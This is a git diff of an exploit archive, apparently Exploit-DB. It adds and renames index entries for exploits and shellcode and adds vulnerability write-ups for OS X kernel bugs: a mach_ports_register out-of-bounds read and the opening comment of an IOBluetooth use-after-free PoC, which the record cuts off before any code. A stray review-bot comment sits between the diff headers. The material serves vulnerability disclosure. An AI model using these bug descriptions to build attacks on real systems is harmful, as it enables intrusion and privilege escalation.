 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0
 39296,platforms/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39297,platforms/php/webapps/39297.txt,"WordPress Theme Authentic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
@@ -35834,7 +35834,7 @@ id,file,description,date,author,platform,type,port
 39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0
 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0
 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0
-39506,platforms/php/webapps/39506.txt,"Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
+39506,platforms/php/webapps/39506.txt,"Joomla! Component 'com_poweradmin' 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80
 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0
@@ -35911,7 +35911,7 @@ id,file,description,date,author,platform,type,port
 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80
 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80
 39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80
-39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy YouTube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
+39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80
 39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
 39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80
 39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
@@ -36036,7 +36036,7 @@ id,file,description,date,author,platform,type,port
 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
-39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21
+39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21
 39730,platforms/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0
 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",linux,dos,0
@@ -36181,7 +36181,7 @@ id,file,description,date,author,platform,type,port
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
 39965,platforms/php/webapps/39965.txt,"Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
-39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
+39879,platforms/php/webapps/39879.txt,"Joomla! Component 'SecurityCheck' 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0
 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
 40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0
@@ -36239,7 +36239,7 @@ id,file,description,date,author,platform,type,port
 39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
-39936,platforms/php/webapps/39936.txt,"Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
+39936,platforms/php/webapps/39936.txt,"Joomla! Component 'com_payplans' 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
 39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80
 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
@@ -36256,7 +36256,7 @@ id,file,description,date,author,platform,type,port
 39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80
 39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80
 39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80
-39953,platforms/php/webapps/39953.txt,"Joomla! Component En Masse (com_enmasse) 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
+39953,platforms/php/webapps/39953.txt,"Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80
 39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80
 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80
@@ -36276,7 +36276,7 @@ id,file,description,date,author,platform,type,port
 39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
-39977,platforms/php/webapps/39977.txt,"Joomla! Component BT Media (com_bt_media) - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
+39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
 39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
 39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0
 39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
@@ -36288,7 +36288,7 @@ id,file,description,date,author,platform,type,port
 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0
 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80
 39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80
-39989,platforms/php/webapps/39989.txt,"Joomla! Component Publisher Pro (com_publisher) - SQL Injection",2016-06-21,s0nk3y,php,webapps,80
+39989,platforms/php/webapps/39989.txt,"Joomla! Component 'com_publisher' - SQL Injection",2016-06-21,s0nk3y,php,webapps,80
 39990,platforms/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0
 39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0
 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
@@ -36298,8 +36298,8 @@ id,file,description,date,author,platform,type,port
 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0
 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80
 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80
-40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro (com_guru) - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
-39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
+40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80
+39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21
 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80
 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80
@@ -36510,9 +36510,9 @@ id,file,description,date,author,platform,type,port
 40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0
 40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
 40254,platforms/cgi/webapps/40254.txt,"SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure",2016-08-17,"Yakir Wizman",cgi,webapps,80
-40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
-40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
-40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
+40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
+40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
+40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80
@@ -36709,7 +36709,7 @@ id,file,description,date,author,platform,type,port
 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
-40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
+40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
@@ -36728,15 +36728,39 @@ id,file,description,date,author,platform,type,port
 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
 40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
+40647,platforms/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Command Denial Of Service",2016-10-31,ScrR1pTK1dd13,windows,dos,0
 40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
 40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
 40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
 40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0
 40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
 40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
+40648,platforms/windows/dos/40648.txt,"Micro Focus Rumba 9.4 - Local Denial Of Service",2016-10-31,"Umit Aksu",windows,dos,0
 40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
 40637,platforms/php/webapps/40637.txt,"Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80
 40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0
+40649,platforms/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos,0
+40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0
+40651,platforms/windows/remote/40651.py,"Rumba FTP Client 4.x - Stack buffer overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote,0
+40652,platforms/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0
+40653,platforms/osx/local/40653.txt,"OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0
+40654,platforms/multiple/dos/40654.txt,"OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0
+40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
+40656,platforms/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos,0
+40657,platforms/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos,0
+40658,platforms/windows/dos/40658.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000194",2016-10-31,"Google Security Research",windows,dos,0
+40659,platforms/windows/dos/40659.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x600000D",2016-10-31,"Google Security Research",windows,dos,0
+40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
+40661,platforms/windows/dos/40661.txt,"NVIDIA Driver - Escape 0x100010b Missing Bounds Check",2016-10-31,"Google Security Research",windows,dos,0
+40662,platforms/windows/dos/40662.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000170",2016-10-31,"Google Security Research",windows,dos,0
+40663,platforms/windows/dos/40663.txt,"NVIDIA Driver - Unchecked User-Provided Pointer in Escape 0x5000027",2016-10-31,"Google Security Research",windows,dos,0
+40664,platforms/windows/dos/40664.txt,"NVIDIA Driver - Incorrect Bounds Check in Escape 0x70001b2",2016-10-31,"Google Security Research",windows,dos,0
+40665,platforms/windows/dos/40665.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x100009a",2016-10-31,"Google Security Research",windows,dos,0
+40666,platforms/windows/dos/40666.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5",2016-10-31,"Google Security Research",windows,dos,0
+40667,platforms/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos,0
+40668,platforms/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos,0
+40669,platforms/osx/local/40669.txt,"MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0
+40670,platforms/windows/remote/40670.py,"PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0
diff --git a/platforms/multiple/dos/40654.txt b/platforms/multiple/dos/40654.txt
new file mode 100755
index 000000000..1d67e440b
--- /dev/null
+++ b/platforms/multiple/dos/40654.txt
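Review bot: Several rows added in the files.csv hunk at -36728 do not follow the title conventions that the rest of this commit is normalising. Row 40651 reads `Stack buffer overflow (SEH)` where the other titles capitalise `Stack Buffer Overflow`, and rows 40653, 40654 and 40669 open with `OS X/iOS Kernel`, `OS X/iOS` and `MacOS 10.12` while row 40652 in the same hunk carries the `Apple OS X Kernel` vendor prefix. Since this index is presumably what people search when matching an advisory to an installed product, I would align the new rows before merging, for example `Rumba FTP Client 4.x - Stack Buffer Overflow (SEH)` and an `Apple` prefix on the three OS X rows.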
@@ -0,0 +1,94 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=882
+
+mach_ports_register is a kernel task port MIG method.
+
+It's defined in MIG like this:
+
+ routine mach_ports_register(
+ target_task : task_t;
+ init_port_set : mach_port_array_t =
+ ^array[] of mach_port_t);
+
+Looking at the generated code for this we notice something kinda weird; here's the mach message structure
+which actually gets sent:
+
+ typedef struct {
+ mach_msg_header_t Head;
+ // start of the kernel processed data
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set;
+ // end of the kernel processed data
+ NDR_record_t NDR;
+ mach_msg_type_number_t init_port_setCnt;
+ } Request __attribute__((unused));
+
+The message contains an OOL ports descriptor, which is expected, but also contains a separate init_port_setCnt value
+even though the ool_ports_descriptor_t already has the correct length of the descriptor.
+
+When the kernel process this ool ports descriptor in ipc_kmsg_copyin_ool_ports_descriptor it will kalloc a buffer large enough
+for all the ports and then copyin and convert them all. It does this using the init_port_set.count value, not init_port_setCnt.
+
+The generated MIG code however calls mach_ports_register like this:
+
+ OutP->RetCode = mach_ports_register(target_task, (mach_port_array_t)(In0P->init_port_set.address), In0P->init_port_setCnt);
+
+without verifying that In0P->init_port_setCnt is equal to init_port_set.count.
+
+This means that when we reach mach_ports_register lots of stuff goes wrong:
+
+ kern_return_t
+ mach_ports_register(
+ task_t task,
+ mach_port_array_t memory, <-- points to kalloc'ed buffer
+ mach_msg_type_number_t portsCnt) <-- completely controlled, not related to size of kalloc'ed buffer
+ {
+ ipc_port_t ports[TASK_PORT_REGISTER_MAX];
+ unsigned int i;
+
+ if ((task == TASK_NULL) ||
+ (portsCnt > TASK_PORT_REGISTER_MAX) ||
+ (portsCnt && memory == NULL))
+ return KERN_INVALID_ARGUMENT; <-- portsCnt must be >=1 && <= 3
+
+ for (i = 0; i < portsCnt; i++)
+ ports[i] = memory[i]; <-- if we only sent one OOL port but set portsCnt >1 this will read a mach_port_t (a pointer) out of bounds
+ for (; i < TASK_PORT_REGISTER_MAX; i++)
+ ports[i] = IP_NULL;
+
+ itk_lock(task);
+ if (task->itk_self == IP_NULL) {
+ itk_unlock(task);
+ return KERN_INVALID_ARGUMENT;
+ }
+
+ for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) {
+ ipc_port_t old;
+
+ old = task->itk_registered[i];
+ task->itk_registered[i] = ports[i];
+ ports[i] = old;
+ }
+
+ itk_unlock(task);
+
+ for (i = 0; i < TASK_PORT_REGISTER_MAX; i++)
+ if (IP_VALID(ports[i]))
+ ipc_port_release_send(ports[i]); <-- this can decrement the ref on a pointer which was read out of bounds if we call this function multiple times
+
+ if (portsCnt != 0)
+ kfree(memory,
+ (vm_size_t) (portsCnt * sizeof(mach_port_t))); <-- this can call kfree with the wrong size
+
+ return KERN_SUCCESS;
+ }
+
+For this PoC I've patched the MIG generated code to always only send one OOL mach port but still set init_port_setCnt to a controlled value - you should see a kernel
+panic decrementing an invalid reference or something like that.
+
+This bug however could be exploited quite nicely to cause a mach_port_t UaF which could have all kinds of fun consequences (getting another task's task port for example!)
+
+tested on OS X 10.11.6 (15G31) on MacBookPro10,1
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40654.zip
diff --git a/platforms/osx/dos/40652.c b/platforms/osx/dos/40652.c
new file mode 100755
index 000000000..e41f7ba35
--- /dev/null
+++ b/platforms/osx/dos/40652.c
@@ -0,0 +1,413 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=830
+
+When you create a new IOKit user client from userspace you call:
+
+ kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
+
+The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
+a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
+
+is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
+by the service.
+
+If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
+
+We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
+we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
+to use the free'd task struct.
+
+IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
+and stores a raw task struct pointer at this+0xe0 without taking a reference.
+
+This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
+
+This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
+passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
+an external method on the user client leading to the UaF.
+
+The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
+this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
+logic stuff too.
+
+Note that bluetooth does have to be turned on for this PoC to work!
+
+build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
+
+You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
+
+tested on OS X 10.11.5 (15F34) on MacBookAir5,2
+*/
+
+// ianbeer
+
+/*
+OS X kernel use-after-free in IOBluetoothFamily.kext
+
+When you create a new IOKit user client from userspace you call:
+
+ kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect );
+
+The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes
+a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference.
+
+is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented
+by the service.
+
+If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference.
+
+We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference
+we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client
+to use the free'd task struct.
+
+IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user
+and stores a raw task struct pointer at this+0xe0 without taking a reference.
+
+This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors.
+
+This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient
+passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes
+an external method on the user client leading to the UaF.
+
+The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that
